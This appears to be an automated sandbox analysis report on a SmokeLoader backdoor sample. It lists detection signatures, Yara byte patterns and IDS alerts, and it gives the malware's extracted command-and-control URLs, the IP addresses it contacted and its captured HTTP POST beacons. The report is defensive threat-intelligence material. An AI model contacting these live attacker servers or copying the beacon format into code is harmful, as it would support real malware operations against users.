Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FyDBXJE74v.exe

Overview

General Information

Sample name:FyDBXJE74v.exe
renamed because original name is a hash value
Original sample name:497859eed941e073a43e8291908e6494.exe
Analysis ID:1532550
MD5:497859eed941e073a43e8291908e6494
SHA1:8136e8e148deeb6c9d18f8300f47e7b3a43b4290
SHA256:8484619768f32fb9368cc46bc15a16cf99c98e95a2a605068adf5dd71090e0c7
Tags:exeSocks5Systemzuser-abuse_ch
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to read the PEB
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • FyDBXJE74v.exe (PID: 7524 cmdline: "C:\Users\user\Desktop\FyDBXJE74v.exe" MD5: 497859EED941E073A43E8291908E6494)
    • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
  • wsbgrgh (PID: 7956 cmdline: C:\Users\user\AppData\Roaming\wsbgrgh MD5: 497859EED941E073A43E8291908E6494)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}
SourceRuleDescriptionAuthorStrings
00000000.00000002.1827444929.0000000002C9D000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x39f4:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.1827317925.0000000002C41000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000000.00000002.1827317925.0000000002C41000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    00000000.00000002.1827175401.0000000002BD0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      00000000.00000002.1827175401.0000000002BD0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
      • 0x614:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
      Click to see the 7 entries

      System Summary

      barindex
      Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\wsbgrgh, CommandLine: C:\Users\user\AppData\Roaming\wsbgrgh, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\wsbgrgh, NewProcessName: C:\Users\user\AppData\Roaming\wsbgrgh, OriginalFileName: C:\Users\user\AppData\Roaming\wsbgrgh, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\wsbgrgh, ProcessId: 7956, ProcessName: wsbgrgh
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-13T17:02:34.009237+020020391031A Network Trojan was detected192.168.2.44973678.89.199.21680TCP
      2024-10-13T17:02:35.260507+020020391031A Network Trojan was detected192.168.2.44973778.89.199.21680TCP
      2024-10-13T17:02:36.675576+020020391031A Network Trojan was detected192.168.2.44973878.89.199.21680TCP
      2024-10-13T17:02:37.879607+020020391031A Network Trojan was detected192.168.2.44973978.89.199.21680TCP
      2024-10-13T17:02:39.110270+020020391031A Network Trojan was detected192.168.2.44974078.89.199.21680TCP
      2024-10-13T17:02:40.315350+020020391031A Network Trojan was detected192.168.2.44974178.89.199.21680TCP
      2024-10-13T17:02:41.719962+020020391031A Network Trojan was detected192.168.2.44974278.89.199.21680TCP
      2024-10-13T17:02:43.127590+020020391031A Network Trojan was detected192.168.2.44974378.89.199.21680TCP
      2024-10-13T17:02:44.418920+020020391031A Network Trojan was detected192.168.2.44974478.89.199.21680TCP
      2024-10-13T17:02:45.652054+020020391031A Network Trojan was detected192.168.2.44974578.89.199.21680TCP
      2024-10-13T17:02:46.866023+020020391031A Network Trojan was detected192.168.2.44974678.89.199.21680TCP
      2024-10-13T17:02:48.088816+020020391031A Network Trojan was detected192.168.2.44974778.89.199.21680TCP
      2024-10-13T17:02:49.324243+020020391031A Network Trojan was detected192.168.2.44974878.89.199.21680TCP
      2024-10-13T17:02:50.631889+020020391031A Network Trojan was detected192.168.2.44974978.89.199.21680TCP
      2024-10-13T17:02:51.847825+020020391031A Network Trojan was detected192.168.2.44975078.89.199.21680TCP
      2024-10-13T17:02:53.053024+020020391031A Network Trojan was detected192.168.2.44975178.89.199.21680TCP
      2024-10-13T17:02:54.269862+020020391031A Network Trojan was detected192.168.2.44975278.89.199.21680TCP
      2024-10-13T17:02:55.483123+020020391031A Network Trojan was detected192.168.2.44975378.89.199.21680TCP
      2024-10-13T17:02:56.676550+020020391031A Network Trojan was detected192.168.2.44975478.89.199.21680TCP
      2024-10-13T17:02:58.136557+020020391031A Network Trojan was detected192.168.2.44975678.89.199.21680TCP
      2024-10-13T17:02:59.375455+020020391031A Network Trojan was detected192.168.2.44976878.89.199.21680TCP
      2024-10-13T17:03:00.567671+020020391031A Network Trojan was detected192.168.2.44977478.89.199.21680TCP
      2024-10-13T17:03:01.795567+020020391031A Network Trojan was detected192.168.2.44978578.89.199.21680TCP
      2024-10-13T17:03:03.055928+020020391031A Network Trojan was detected192.168.2.44979478.89.199.21680TCP
      2024-10-13T17:03:04.302004+020020391031A Network Trojan was detected192.168.2.44980278.89.199.21680TCP
      2024-10-13T17:03:05.654853+020020391031A Network Trojan was detected192.168.2.44981078.89.199.21680TCP
      2024-10-13T17:03:06.907800+020020391031A Network Trojan was detected192.168.2.44981978.89.199.21680TCP
      2024-10-13T17:03:08.190298+020020391031A Network Trojan was detected192.168.2.44982878.89.199.21680TCP
      2024-10-13T17:03:09.445903+020020391031A Network Trojan was detected192.168.2.44983678.89.199.21680TCP
      2024-10-13T17:03:10.849624+020020391031A Network Trojan was detected192.168.2.44984578.89.199.21680TCP
      2024-10-13T17:03:12.157474+020020391031A Network Trojan was detected192.168.2.44985678.89.199.21680TCP
      2024-10-13T17:03:13.543698+020020391031A Network Trojan was detected192.168.2.44986478.89.199.21680TCP
      2024-10-13T17:03:14.797727+020020391031A Network Trojan was detected192.168.2.44987378.89.199.21680TCP
      2024-10-13T17:03:15.976762+020020391031A Network Trojan was detected192.168.2.44988278.89.199.21680TCP
      2024-10-13T17:03:17.244744+020020391031A Network Trojan was detected192.168.2.44989078.89.199.21680TCP
      2024-10-13T17:03:18.612428+020020391031A Network Trojan was detected192.168.2.44989678.89.199.21680TCP
      2024-10-13T17:04:28.029229+020020391031A Network Trojan was detected192.168.2.45003878.89.199.21680TCP
      2024-10-13T17:04:34.140280+020020391031A Network Trojan was detected192.168.2.45003978.89.199.21680TCP
      2024-10-13T17:04:39.391353+020020391031A Network Trojan was detected192.168.2.45004078.89.199.21680TCP
      2024-10-13T17:04:44.509898+020020391031A Network Trojan was detected192.168.2.45004178.89.199.21680TCP
      2024-10-13T17:04:50.069868+020020391031A Network Trojan was detected192.168.2.45004278.89.199.21680TCP
      2024-10-13T17:04:55.760104+020020391031A Network Trojan was detected192.168.2.45004378.89.199.21680TCP
      2024-10-13T17:05:01.475818+020020391031A Network Trojan was detected192.168.2.45004478.89.199.21680TCP
      2024-10-13T17:05:06.987167+020020391031A Network Trojan was detected192.168.2.450045109.175.29.3980TCP
      2024-10-13T17:05:11.639706+020020391031A Network Trojan was detected192.168.2.450046109.175.29.3980TCP
      2024-10-13T17:05:16.825285+020020391031A Network Trojan was detected192.168.2.450047109.175.29.3980TCP
      2024-10-13T17:05:23.062242+020020391031A Network Trojan was detected192.168.2.450048109.175.29.3980TCP
      2024-10-13T17:05:28.723373+020020391031A Network Trojan was detected192.168.2.450049109.175.29.3980TCP
      2024-10-13T17:05:34.540144+020020391031A Network Trojan was detected192.168.2.450050109.175.29.3980TCP
      2024-10-13T17:05:40.583026+020020391031A Network Trojan was detected192.168.2.450051109.175.29.3980TCP
      2024-10-13T17:05:45.894239+020020391031A Network Trojan was detected192.168.2.450052109.175.29.3980TCP
      2024-10-13T17:05:50.727891+020020391031A Network Trojan was detected192.168.2.450053109.175.29.3980TCP
      2024-10-13T17:05:56.082119+020020391031A Network Trojan was detected192.168.2.450054109.175.29.3980TCP
      2024-10-13T17:06:01.188741+020020391031A Network Trojan was detected192.168.2.450055109.175.29.3980TCP
      2024-10-13T17:06:06.774445+020020391031A Network Trojan was detected192.168.2.450056109.175.29.3980TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: FyDBXJE74v.exeAvira: detected
      Source: C:\Users\user\AppData\Roaming\wsbgrghAvira: detection malicious, Label: HEUR/AGEN.1312571
      Source: 00000000.00000002.1827175401.0000000002BD0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}
      Source: nwgrus.ruVirustotal: Detection: 12%Perma Link
      Source: http://nwgrus.ru/tmp/index.phpVirustotal: Detection: 16%Perma Link
      Source: C:\Users\user\AppData\Roaming\wsbgrghReversingLabs: Detection: 39%
      Source: C:\Users\user\AppData\Roaming\wsbgrghVirustotal: Detection: 41%Perma Link
      Source: FyDBXJE74v.exeReversingLabs: Detection: 39%
      Source: FyDBXJE74v.exeVirustotal: Detection: 41%Perma Link
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: C:\Users\user\AppData\Roaming\wsbgrghJoe Sandbox ML: detected
      Source: FyDBXJE74v.exeJoe Sandbox ML: detected
      Source: FyDBXJE74v.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: C:\Users\user\Desktop\FyDBXJE74v.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

      Networking

      barindex
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49738 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49744 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49747 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49736 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49768 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49774 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49785 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49753 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49750 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49802 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49752 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49742 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49741 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49743 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49739 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49756 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49751 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49819 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49873 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49754 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49794 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49745 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49749 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49740 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49845 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49737 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49746 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49856 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49828 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49896 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49864 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49836 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49890 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49748 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49882 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49810 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50042 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50056 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50041 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50044 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50040 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50043 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50052 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50051 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50048 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50046 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50038 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50045 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50039 -> 78.89.199.216:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50053 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50049 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50054 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50055 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50047 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50050 -> 109.175.29.39:80
      Source: C:\Windows\explorer.exeNetwork Connect: 109.175.29.39 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 78.89.199.216 80Jump to behavior
      Source: Malware configuration extractorURLs: http://nwgrus.ru/tmp/index.php
      Source: Malware configuration extractorURLs: http://tech-servers.in.net/tmp/index.php
      Source: Malware configuration extractorURLs: http://unicea.ws/tmp/index.php
      Source: Joe Sandbox ViewIP Address: 109.175.29.39 109.175.29.39
      Source: Joe Sandbox ViewIP Address: 78.89.199.216 78.89.199.216
      Source: Joe Sandbox ViewASN Name: BIHNETBIHNETAutonomusSystemBA BIHNETBIHNETAutonomusSystemBA
      Source: Joe Sandbox ViewASN Name: WATANIYATELECOM-ASKW WATANIYATELECOM-ASKW
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://procusohdnplkcl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 267Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yagmckrhrxidkkt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 261Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dricwaygwumvuqyx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 183Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dvywoyvbihbnwwjn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 282Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mbmyqakevfccgv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 289Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://clrhahncwuyc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 305Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fxjvbidmvidvfvuu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 218Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qfasgfhewcyw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 217Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ajnjimgspja.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 339Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://orfuocjxhujvp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 266Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sukwfdfgeltdloqp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 218Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cspwoprndoye.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 128Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qtrqfgpakuyxgovn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 262Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cmqaenxsxeyowd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rpyskssnoppwv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 290Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uspdxnihexd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 202Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fljiwnmgncpvmdu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 234Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hbbbwgrmtjdu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 234Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yhuliplstnjp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 173Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hiodckefgdl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 131Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cttvtshacog.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 228Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://baalviblkbjsp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 160Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gwngaiusekur.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 286Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mxjrhmxwrwqyxs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 316Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fcwffmgjsqp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 343Host: nwgrus.ru
